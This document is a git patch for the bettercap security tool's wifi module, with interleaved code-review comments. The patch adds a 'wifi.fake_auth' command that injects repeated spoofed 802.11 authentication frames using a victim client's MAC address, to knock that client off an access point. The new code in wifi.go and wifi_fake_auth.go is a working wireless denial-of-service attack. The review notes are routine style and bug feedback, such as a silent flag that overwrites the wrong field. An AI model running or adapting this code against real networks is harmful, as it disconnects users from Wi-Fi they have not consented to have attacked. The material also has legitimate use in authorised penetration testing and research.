From 6bfe8a91a1d690f77fa7cda34ebd17d2d59710b5 Mon Sep 17 00:00:00 2001 From: ydx Date: Tue, 16 Jun 2020 12:05:51 +0800 Subject: [PATCH] add fake auth attack --- modules/wifi/wifi.go | 27 ++++++++++++ modules/wifi/wifi_fake_auth.go | 75 ++++++++++++++++++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 modules/wifi/wifi_fake_auth.go diff --git a/modules/wifi/wifi.go b/modules/wifi/wifi.go index acfcc61f..c9da78e0 100644 --- a/modules/wifi/wifi.go +++ b/modules/wifi/wifi.go @@ -53,6 +53,7 @@ type WiFiModule struct { assocSilent bool assocOpen bool csaSilent bool + fakeAuthSilent bool filterProbeSTA *regexp.Regexp filterProbeAP *regexp.Regexp apRunning bool @@ -85,6 +86,7 @@ func NewWiFiModule(s *session.Session) *WiFiModule { assocSilent: false, assocOpen: false, csaSilent: false, + fakeAuthSilent: false, showManuf: false, shakesAggregate: true, writes: &sync.WaitGroup{}, @@ -220,10 +222,35 @@ func NewWiFiModule(s *session.Session) *WiFiModule { mod.AddHandler(switch_channel_announce) + + fake_auth := session.NewModuleHandler("wifi.fake_auth bssid client", `wifi\.fake_auth ((?:[a-fA-F0-9:]{11,}))\s+((?:[a-fA-F0-9:]{11,}))`, + "send an fake authentication with client mac to ap lead to client disconnect", + func(args []string) error { + bssid, err := net.ParseMAC(args[0]) + if err != nil { + return err + } + + client,err:=net.ParseMAC(args[1]) + if err!=nil{ + return err + } + return mod.startFakeAuth(bssid,client) + }) + + fake_auth.Complete("wifi.fake_auth", s.WiFiCompleterFull) + + mod.AddHandler(fake_auth) + + mod.AddParam(session.NewBoolParameter("wifi.channel_switch_announce.silent", "false", "If true, messages from wifi.channel_switch_announce will be suppressed.")) + mod.AddParam(session.NewBoolParameter("wifi.fake_auth.silent", + "false", + "If true, messages from wifi.fake_auth will be suppressed.")) + mod.AddParam(session.NewStringParameter("wifi.deauth.skip", "", "", 
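Review bot: In the `@@ -220,10 +222,35 @@` hunk of modules/wifi/wifi.go the new handler body is not gofmt-formatted: `client,err:=net.ParseMAC(args[1])` and `if err!=nil{` should read `client, err := net.ParseMAC(args[1])` and `if err != nil {`. The help string `send an fake authentication with client mac to ap lead to client disconnect` is hard to read; `send a fake authentication frame to the AP using the client's MAC address, which disconnects that client` says the same thing plainly. Both `net.ParseMAC` errors are returned bare, so the user cannot tell whether the BSSID or the client address was rejected; a short prefix naming the argument would help. NewWiFiModule starts and ends outside this hunk.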
diff --git a/modules/wifi/wifi_fake_auth.go b/modules/wifi/wifi_fake_auth.go
new file mode 100644
index 00000000..22ef8c09
--- /dev/null
+++ b/modules/wifi/wifi_fake_auth.go
@@ -0,0 +1,75 @@
+package wifi
+
+import (
+ "bytes"
+ "fmt"
+ "github.com/bettercap/bettercap/network"
+ "github.com/bettercap/bettercap/packets"
+ "net"
+)
+
+
+func (mod *WiFiModule) isFakeAuthSilent() bool {
+ if err, is := mod.BoolParam("wifi.fake_auth.silent"); err != nil {
+ mod.Warning("%v", err)
+ } else {
+ mod.csaSilent = is
+ }
+ return mod.csaSilent
+}
+
+
+func(mod *WiFiModule)sendFakeAuthPacket(ap *network.AccessPoint,bssid,client net.HardwareAddr){
+ err,pkt:=packets.NewDot11Auth(client,bssid,0)
+ if err!=nil{
+ mod.Error("could not create authentication packet: %s", err)
+ return
+ }
+ for i:=0;i<20;i++{
+ mod.injectPacket(pkt)
+ }
+}
+
+func (mod *WiFiModule) startFakeAuth(bssid,client net.HardwareAddr) error {
+ // if not already running, temporarily enable the pcap handle
+ // for packet injection
+ if !mod.Running() {
+ if err := mod.Configure(); err != nil {
+ return err
+ }
+ defer mod.handle.Close()
+ }
+
+ var ap *network.AccessPoint = nil
+
+ for _, _ap := range mod.Session.WiFi.List() {
+ if bytes.Equal(_ap.HW, bssid) {
+ ap = _ap
+ }
+
+ }
+
+ if ap == nil {
+ return fmt.Errorf("%s is an unknown BSSID", bssid.String())
+ }
+
+ mod.writes.Add(1)
+ go func() {
+ defer mod.writes.Done()
+
+ if mod.Running() {
+ logger := mod.Info
+ if mod.isFakeAuthSilent() {
+ logger = mod.Debug
+ }
+ logger("fake authentication attack in AP: %s client: %s", ap.ESSID(), client.String())
+ // send the beacon frame with channel switch announce element id
+ mod.onChannel(ap.Channel, func() {
+ mod.sendFakeAuthPacket(ap, bssid,client)
+ })
+ }
+
+ }()
+
+ return nil
+}
\ No newline at end of file
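Review bot: `isFakeAuthSilent` assigns and returns `mod.csaSilent`, so reading `wifi.fake_auth.silent` overwrites the channel-switch-announce flag and the `fakeAuthSilent` field added in wifi.go is never used; the two lines should be `mod.fakeAuthSilent = is` and `return mod.fakeAuthSilent`. The comment above `mod.onChannel` in `startFakeAuth` still describes a beacon frame with a channel switch announce element and should be replaced with something like `// inject the authentication frames on the AP's channel`. The `ap` parameter of `sendFakeAuthPacket` is unused, the lookup loop keeps iterating after a match (a `break` after `ap = _ap` would do), and `var ap *network.AccessPoint = nil` can be `var ap *network.AccessPoint`. The file is also not gofmt-clean (`func(mod *WiFiModule)sendFakeAuthPacket(`, `err,pkt:=`, `for i:=0;i<20;i++{`) and mixes standard-library and project imports in one group.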